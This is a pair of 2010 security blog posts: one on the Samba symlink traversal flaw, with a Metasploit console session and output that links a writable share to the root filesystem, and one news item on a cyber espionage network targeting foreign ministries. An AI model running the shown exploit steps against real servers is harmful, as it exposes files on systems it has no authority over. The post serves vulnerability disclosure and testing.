Posted by: Charlie Clark
in General security on 02, 08, 2010
Tagged in: Untagged
Last night, Kingcope uploaded a video to YouTube demonstrating a logic flaw in the Samba CIFS service (this was followed by a mailing list post). This bug allows any user with write access to a file share to create a symbolic link to the root filesystem. From this link, the user can access any file on the system with their current privileges. This affects any Samba service that allows anonymous write access; however, read access to the filesystem is limited by normal user-level privileges. In most cases, anonymous users are limited to the 'nobody' account, limiting the damage possible through this exploit.
A Metasploit auxiliary module has been added to verify and test this vulnerability. Update to SVN revision 8369 or newer and start up the Metasploit Console:
$ msfconsole
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.0.2
msf auxiliary(samba_symlink_traversal) > set SMBSHARE shared
msf auxiliary(samba_symlink_traversal) > set SMBTARGET rooted
msf auxiliary(samba_symlink_traversal) > run
[*] Connecting to the server...
[*] Trying to mount writeable share 'shared'...
[*] Trying to link 'rooted' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.0.2\shared\rooted
Keep in mind that non-anonymous shares can be used as well; just enter SMBUser and SMBPass for a valid user account.
Posted by: Charlie Clark
in General security on 02, 03, 2010
Tagged in: Untagged
The Department of Foreign Affairs (DFA) was attacked by a cyber spy network.
DFA officials admitted that they were taking these reports seriously. The cyber attack on DFA was reported by the Toronto-based Information Welfare Monitor.
The Philippines is one of the 103 countries where classified documents from government and private organizations have been hacked into, including the computers of the Dalai Lama and Tibetan exiles, said IWM.
IWM is composed of researchers from Ottawa-based think tank SecDev Group and University of Toronto’s Munk Center for International Studies.
The Canadian researchers detected a cyber espionage network involving more than 1,295 compromised computers from the ministries of foreign affairs of the Philippines, Iran, Bangladesh, Latvia, Indonesia, Brunei, Barbados and Bhutan.
The researchers also discovered hacked systems in the embassies of India, South Korea, Indonesia, Romania, Cyprus, Malta, Thailand, Taiwan, Portugal, Germany and Pakistan.
The USA is also being attacked. And these attacks are proliferating, according to a Federal Bureau of Investigation (FBI) report.
The FBI report lays out the identifiable attacks originating from China just on the Defense Department computers; they increased from 44,000 in 2007 to 55,000 in 2008, and topped 90,000 last year.
The Chinese hackers are not after credit card numbers or bank accounts or looking to steal private identities. They are hunting for information.
Although the barrage of attacks may at times appear random, the FBI report concludes that it is part of a strategy to fully flush out US military telecommunications and to better understand—and to attempt to intercept—intelligence being gathered by American spy agencies, particularly the National Security Agency.